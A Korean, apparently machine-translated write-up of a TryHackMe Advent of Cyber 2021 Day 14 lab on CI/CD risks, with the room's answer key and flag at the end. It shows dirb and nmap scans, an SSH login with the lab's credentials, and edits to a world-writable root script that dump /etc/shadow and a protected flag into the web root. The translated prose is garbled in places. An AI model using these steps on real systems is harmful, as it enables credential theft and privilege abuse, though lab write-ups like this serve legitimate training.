[TryHackMe] 계속해서 Advent of Cyber3(2021)의 Day14.
크리스마스까지 25일 동안 매일 기본지식을 배우고 초보자를 대상으로 하는 새로운 안전 훈련을 실시하면 네트워크 보안을 시작할 수 있다.
day14
학습 목표
-SCI/CD 개념 이해
-CC/CD 관련 위험 요약
- IC/CD 자원 벡터에 대한 기본적인 이해가 있습니다.
나는 공개된 서류를 찾으러 간다.
┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.197.99 -o dirb-log
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb-log
START_TIME: Wed Dec 15 01:53:26 2021
URL_BASE: http://10.10.197.99/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.197.99/ ----
┌──(kali㉿kali)-[~]
└─$ sudo nmap -vv -sS -Pn -n -A -p- -T4 10.10.197.99 -o nmap-log
...
Discovered open port 80/tcp on 10.10.197.99
Discovered open port 22/tcp on 10.10.197.99
...
http://10.10.197.99/admin ls.html
읽는 중입니다.ssh 연결을 진행합니다.(mcskidy:Password1)
┌──(kali㉿kali)-[~]
└─$ ssh [email protected] -p 22 130 ⨯
The authenticity of host '10.10.197.99 (10.10.197.99)' can't be established.
ED25519 key fingerprint is SHA256:9kEyTFIOxOqgfya4ZMo+1VTqJ7nC4zuupBW619K7IZs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.197.99' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-1029-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
147 packages can be updated.
99 updates are security updates.
Last login: Thu Nov 11 12:50:44 2021 from 10.9.1.60
mcskidy@ip-10-10-197-99:~$
SSH가 연결되었습니다.그럼 누가 있는지 보자.mcskidy@ip-10-10-197-99:/home$ ll
total 24
drwxr-xr-x 6 root root 4096 Nov 11 08:27 ./
drwxr-xr-x 23 root root 4096 Dec 14 16:47 ../
drwxr-xr-x 5 mcskidy mcskidy 4096 Nov 11 08:03 mcskidy/
drwxr-xr-x 2 pepper pepper 4096 Nov 11 08:27 pepper/
drwxr-xr-x 7 thegrinch thegrinch 4096 Nov 11 19:50 thegrinch/
drwxr-xr-x 5 ubuntu ubuntu 4096 Nov 11 05:52 ubuntu/
/home/thegrinch/scripts
뭐가 있는지 확인하세요.mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ ll
total 20
drwxr-xr-x 2 root root 4096 Nov 11 20:03 ./
drwxr-xr-x 7 thegrinch thegrinch 4096 Nov 11 19:50 ../
-rwx------ 1 root root 286 Nov 11 20:03 check.sh*
-rwx------ 1 root root 58 Nov 11 09:00 cleanup.sh*
-rwxrwxrwx 1 root root 61 Nov 11 19:56 loot.sh*
-rwx------ 1 root root 0 Nov 11 07:58 test.sh*
패스워드 정보가 기재된/etc/shoadow를 볼 수 있는지 확인하십시오.mcskidy@ip-10-10-197-99:~$ less /etc/shadow
/etc/shadow: Permission denied
지금 아까 거loot.sh
확인해 보세요.mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ less loot.sh
#!/bin/bash
ls /home/thegrinch/loot > /var/www/html/ls.html
이sh 파일을 바꿔서/etc/shoadow를 볼 수 있는지 확인해 보겠습니다.mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ cat loot.sh
#!/bin/bash
cat /etc/shadow > /var/www/html/ls.html
Done!!/home/thegrinch/Desktop에서 실천을 확인할 수 있습니까?flag, txt 가 발견되었습니다.하지만
drwxr-xr-x
mcskidy@ip-10-10-197-99:/home/thegrinch$ ll
total 44
drwxr-xr-x 7 thegrinch thegrinch 4096 Nov 11 19:50 ./
drwxr-xr-x 6 root root 4096 Nov 11 08:27 ../
-rw------- 1 thegrinch thegrinch 33 Nov 11 07:46 .bash_history
-rw-r--r-- 1 thegrinch thegrinch 220 Nov 11 05:53 .bash_logout
-rw-r--r-- 1 thegrinch thegrinch 3771 Nov 11 05:53 .bashrc
drwx------ 2 thegrinch thegrinch 4096 Nov 11 05:58 .cache/
drwx------ 3 thegrinch thegrinch 4096 Nov 11 05:58 .gnupg/
-rw-r--r-- 1 thegrinch thegrinch 807 Nov 11 05:53 .profile
-rw-r--r-- 1 thegrinch thegrinch 0 Nov 11 05:58 .sudo_as_admin_successful
drwxr-xr-x 2 root root 4096 Nov 11 19:50 Desktop/
drwxrwxrwx 2 root root 4096 Nov 11 20:11 loot/
drwxr-xr-x 2 root root 4096 Nov 11 20:03 scripts/
mcskidy@ip-10-10-197-99:/home/thegrinch$ ls Desktop/
flag.txt
따라서cat 명령을 잘 사용합니다.mcskidy@ip-10-10-197-99:/home/thegrinch$ cat Desktop/flag.txt
cat: Desktop/flag.txt: Permission denied
다른 노선을 고려하다.mcskidy@ip-10-10-197-99:/home/thegrinch/scripts$ cat loot.sh
#!/bin/bash
cat /home/thegrinch/Desktop/flag.txt > /var/www/html/ls.html
Answer
How many pages did the dirb scan find with its default wordlist?
4
How many scripts do you see in the/home/thegrinch/scripts folder?
4
What are the five characters following $6$G in pepper's password hash?
ZUP42
What is the content of the flag.txt file on the Grinch's user’s desktop?
DI3H4rdIsTheBestX-masMovie!
Reference
이 문제에 관하여([TryHackMe] 계속해서 Advent of Cyber3(2021)의 Day14.), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/hoglet/items/c03cec92f2999065f0b5텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)